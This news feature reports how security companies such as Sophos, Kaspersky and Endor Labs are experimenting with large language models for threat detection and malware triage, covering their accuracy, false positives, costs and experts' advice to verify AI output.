How defenders are experimenting with artificial intelligence

AI dominated conversations at the RSA Security Conference in May, but underneath the hype, some real changes are in the works.

When cybersecurity firm Sophos wanted to find ways to expand its use of machine learning and artificial intelligence models in its cybersecurity workflow and products, the company turned to large language models, or LLMs.

Experiments with the classification of web domains, for example, found that a version of the generative pre-trained transformer GPT-3 — the basis for ChatGPT — could effectively classify domains and teach smaller, and more cost-efficient, LLMs to do a better job on the task as well, the company said in a research paper released in May. Sophos also found a more efficient transformer-based model for natural language processing that could detect malicious sentiment in phishing emails and business email compromise attacks, demonstrating 82% and 90% detection rates, respectively, with a 0.1% false positive rate.

These advances highlight the ways AI is set to change cybersecurity, essentially by simulating and augmenting cybersecurity analysts’ workflow and intuition, Sophos president and chief technology officer Joe Levy told README.

“It’s clearly exhibiting a set of valuable capabilities in expressing a sort of intelligence when reasoning with cybersecurity problems now,” Levy said. “We’re seeing clear indications that it’s beginning to demonstrate intuitions that will allow it to, not necessarily replace the human analyst, but certainly to augment human analysts.”

Sophos is not alone. In the months since the launch of ChatGPT, the ability of LLMs to synthesize human-sounding prose and recall an immense amount of information culled from the internet has boosted the AI approach to the forefront of the internet zeitgeist.

Security companies inundated the RSA Security Conference in April with product descriptions that include some mention of features derived from ChatGPT or other generative pre-trained transformer (GPT) models. Ratings firm SecurityScorecard launched a new version that integrates GPT-4 searching, for example, while Veracode unveiled Veracode Fix using a GPT model to suggest code changes to fix security issues. Both CrowdStrike and Microsoft have launched AI-based assistants — Charlotte and Copilot, respectively — to help triage potential threats in security operations centers.

In some ways, companies are behind in the race to adopt AI: Security professionals have already warned that attackers are finding ways to use GPT chatbots to create more convincing phishing emails and improve other fraud schemes. The industry’s rush to experiment with LLMs, however, shows that defenders are going to benefit from intelligent automation as well.

Time-saving automation

A big focus is on making security professionals more efficient. Companies have integrated AI models for security into their products, often with an eye on saving time for already-overworked analysts, developers, and administrators.

Software services firm GitLab, for example, uses LLMs to explain vulnerabilities and help generate automated tests for security issues. Kaspersky relies heavily on machine-learning technologies to aid its security professionals, too. Of the 433,000 security events processed by the company’s managed detection and response service, a third were classified by the companies machine-learning systems, while 292,000 events were vetted by security analysts.

1_PT7iCKK4VJDMKS2eolOGMw-1 
Alexander Sinn / Unsplash

The ability to save time does not just occur in the primary task — such as code generation or malware classification — either, but throughout the workflow. Software supply-chain security firm Endor Labs has experimented with using GPT 3.5 to identify malware artifacts in open-source packages, finding that the LLM could explain the function of the code but had trouble determining whether a function is malicious. While the current technology, which is not even trained on code-specific tasks, is wrong as often as it is right, the company will continue to use it in parallel in its pipeline, Henrik Plate, a security researcher with Endor Labs, told README.

“When it’s accurate and I need to create a report, I can just take the explanation of what the malicious code does and copy it into my email, which saves me a lot of time,” he said.

Don’t trust, always verify

The danger in generative AI is in the Eliza effect — a psychological condition where a human interacting with a conversational machine-learning program begins to believe that it will respond in the same way, or has the same reasoning process, as a human. As a result, when small changes cause a completely different output in an LLM, people tend to be surprised.

In its experiments with using ChatGPT to classify indicators of compromise (IOCs) on hosts, Kaspersky found that the LLM could identify the traces of common tools like Mimikatz and Fast Reverse Proxy, but failed to identify an indicator for WannaCry and identified a legitimate component, lsass.exe, as malicious. Overall, the method highlighted 74 security events, but with a 20% false positives rate.

“Beware of false positives and false negatives that this can produce,” Victor Sergeev, incident response team lead at Kaspersky, said in the analysis. “At the end of the day, this is just another statistical neural network prone to producing unexpected results.”

In its experiment with malicious code classification, Endor Labs queried GPT-3.5 with 1,874 code artifacts, asking it to determine if the code was malicious and to explain why or why not. Sometimes small changes in the input led to dramatic changes in the output, with no clear reason. Just adding a certain comment, such as “this is image manipulation function,” could flip the assessment, Endor Labs’ Plate told README.

The lesson is that anyone who uses AI should be able to check its results, he said.

“When I use it, no matter for malware assessment or for developing myself, I only let it produce things that I can verify myself, so I can check the thing that it produces,” Plate said. “So for example, I wouldn’t let it summarize a book, because there’s no way I can check in a short amount of time whether the book summary is in any way accurate or totally made up.”

Beware the downsides

Companies should enthusiastically experiment, but be equally cognizant of the potential pitfalls of current LLMs, experts say.

Cost is one major downside. LLMs are not only expensive to train, but also expensive to run. Current estimates put the cost of running a ChatGPT-type LLM at about 0.3 to 1.0 cents per query, which might not seem like much, but it quickly adds up when performing large-scale tasks such as requesting inferences for every domain visited by the average user. Scanning hosts for indicators of compromise costs between $15 and $25 per machine, according to Kaspersky.

Yet, these systems can be optimized. Sophos found that the general GPT-3 Babbage model, which requires the processing of 3 billion parameters for each decision, costs too much to be used to classify URLs in a production setting, but using larger LLMs to train stripped-down “student” models that were 175 times smaller allowed for significant cost reduction without a significant dip in accuracy, the company said in its research paper.

In the end, AI looks ready to help reduce the deluge of data that human analysts must face on a daily basis. Yet, the human part of the equation will remain critical, so companies should proceed with diligence, Kaspersky’s Sergeev told README.

“AI tools like ChatGPT can assist in certain types of tasks, but they cannot completely replace the expertise and judgment of humans,” he said. “Integration of AI assistants into everyday routine should not be too fast and … require[s] special education, such as explaining AI’s possibilities and limitations.”